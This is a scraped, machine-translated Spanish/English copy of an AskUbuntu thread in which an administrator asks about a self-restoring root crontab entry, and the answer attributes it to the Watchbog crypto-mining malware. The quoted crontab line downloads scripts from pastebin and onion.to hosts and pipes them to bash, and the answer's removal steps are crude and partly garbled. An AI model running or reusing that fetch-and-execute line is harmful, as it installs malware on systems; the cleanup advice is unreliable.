Ubuntu Server 16.04 Inusual Crontab Entrada -- server campo con cron camp askubuntu Relacionados El problema

Ubuntu Server 16.04 unusual crontab entry


0
vote

problema

Español

buen día a todos,

Tengo esta entrada de crontab en el usuario root de nuestro servidor Ubuntu 16.04 VM.

  */11 * * * * (curl -fsSL https://pastebin.com/raw/9QVpd02i||wget -q -O- https://pastebin.com/raw/9QVpd02i||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/t3B4cpC8").read()'||curl -fsSL https://pastebin.com/raw/TwuQybiQ||wget -q -O - https://pastebin.com/raw/TwuQybiQ||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt -m 90||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash   

Cada vez que borré esta entrada, volverá momentos más tarde. ¿Alguien tiene alguna idea de lo que he entrado? ¿Este servidor está empeñado de alguna manera?

La solución que he hecho para derrotar esta entrada, porque no puedo eliminarlo permanentemente, he realizado dos entradas DNS en nuestra puerta de enlace / enrutador donde Pastebin.com y la ONION.Para señalarán 127.0.0.1.

Creo que esto no es un duplicado del problema de Crypto publicado en el comentario, pero es similar. Por lo tanto, esta pregunta permanecerá separada, ya que después de la revisión, esto requerirá una solución diferente. Gracias.

Saludos, Allan

Original en ingles

Good day to all,

I have this crontab entry in the root user of our Ubuntu Server 16.04 VM.

*/11 * * * * (curl -fsSL https://pastebin.com/raw/9QVpd02i||wget -q -O- https://pastebin.com/raw/9QVpd02i||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/t3B4cpC8").read()'||curl -fsSL https://pastebin.com/raw/TwuQybiQ||wget -q -O - https://pastebin.com/raw/TwuQybiQ||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt -m 90||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash 

Every time I deleted this entry, it will come back moments later. Does anyone have any idea what I have gone into? Is this server was pawned in some way?

The workaround I've done to defeat this entry, because I can't permanently delete it, I have made two DNS entries in our gateway/router where pastebin.com and onion.to will point to 127.0.0.1.

I think this is not a duplicate of the crypto issue posted in the comment, but is similar. So, this question will remain separate, since after review, this will require a different solution. Thanks.

Regards, Allan

     
     
     

Lista de respuestas

1
 
vote
vote
La mejor respuesta
 

Como se indica en los comentarios, tiene un virus instalado por Crypto Miner. Esto le dice cómo eliminarlo: vulnerabilidad de observación

para resumir los pasos:

  crontab â€"r ls /var/spool/cron/crontabs pip uninstall urllib2 apt-get remove --auto-remove curl apt-get remove --auto-remove wget crontab -r while true ; do killall watchbog ; done sudo passwd root   

Lea el enlace completo para los detalles paso a paso y para verificar que tiene este virus en primer lugar.

 

As stated in comments you have a virus installed by crypto miner. This tells you how to remove it: Watchbog Vulnerability

To summarize the steps:

crontab xe2x80x93r ls /var/spool/cron/crontabs pip uninstall urllib2 apt-get remove --auto-remove curl apt-get remove --auto-remove wget crontab -r while true ; do killall watchbog ; done sudo passwd root 

Read the entire link for step by step details and to verify you have this virus in the first place.

 
 
         
         

Relacionados problema

3  Cómo verificar el uso de la red en más de x minutos  ( How to check network usage over past x minutes ) 
Tengo una PC de medios (que también es un servidor de pruebas web en la LAN) que quiero reiniciar cada a menudo siempre que no esté en uso. Sin embargo, tengo...

0  ¿Hay alguna manera de saber si el demonio de transmisión actualmente está activo?  ( Is there a way to know if transmission daemon currently active ) 
Tengo una computadora portátil que utilizo como una estación de medios conectada a mi televisor, de vez en cuando caería un sueño y olvidé apagar la computado...

2  Los trabajos especificados en / etc / crontab se están ejecutando en el tiempo de Wong, ¿por qué? [duplicar]  ( The jobs specified in etc crontab are running at the wong time why ) 
Esta pregunta ya tiene respuestas aquí : ¿A qué hora ejecuta Cron? ...

158  Cambio de editor de crontab predeterminado  ( Changing default crontab editor ) 
Estoy tratando de cambiar el editor predeterminado de nano a vim . He ejecutado los siguientes comandos: ABCDEFGHIJKLMNABCDEFGHIJKLMN2 y ABCDEFG...

4  ¿Cómo puedo mostrar notificar: enviar mensajes activados por CRONTAB? [duplicar]  ( How can i show notify send messages triggered by crontab ) 
Esta pregunta ya tiene respuestas aquí : cron trabajo para ejecutar la secuencia de comandos de Pyth...

7  Configuración de la copia de seguridad semanal de Cron  ( Setup cron weekly backup ) 
Quiero hacer una copia de seguridad de mi /var/lib/mysql y abcdefhijklmn/var/www carpetas y guárdelas como archivos tar.gz en mi servidor de archivos de r...

1  Cómo activar el inicio de anacron si la unidad USB conecta  ( How to trigger anacron start if usb drive connected ) 
Hay un script en /usr/lib/pm-utils/power.d/anacron que reinicia a Anacon si los leptops están conectados a la alimentación. ¿Es posible tener un reinicio de...

19  Ubuntu 16.04: Las actualizaciones desatendidas se ejecutan en tiempos aleatorios  ( Ubuntu 16 04 unattended upgrades runs at random times ) 
He configurado actualizaciones desatendidas para instalar paquetes de seguridad y notificar por correo cuando lo hace. Me he dado cuenta de que la instalaci...

0  Es posible convertir la computadora y mantenerlo fuera [duplicado]  ( It it possible to turn computer off and keep it off ) 
Esta pregunta ya tiene respuestas aquí : ¿Cómo restringo el tiempo de computación de mis hijos? ...

3  Crontab y SSMTP  ( Crontab and ssmtp ) 
Mi servidor es Ubuntu 12.04.3 Los trabajos de Cron están funcionando bien. Puedo enviar correos electrónicos a través de la línea de comandos, ya sea utilizan...




© 2022 respuesta.top Reservados todos los derechos. Centro de preguntas y respuestas reservados todos los derechos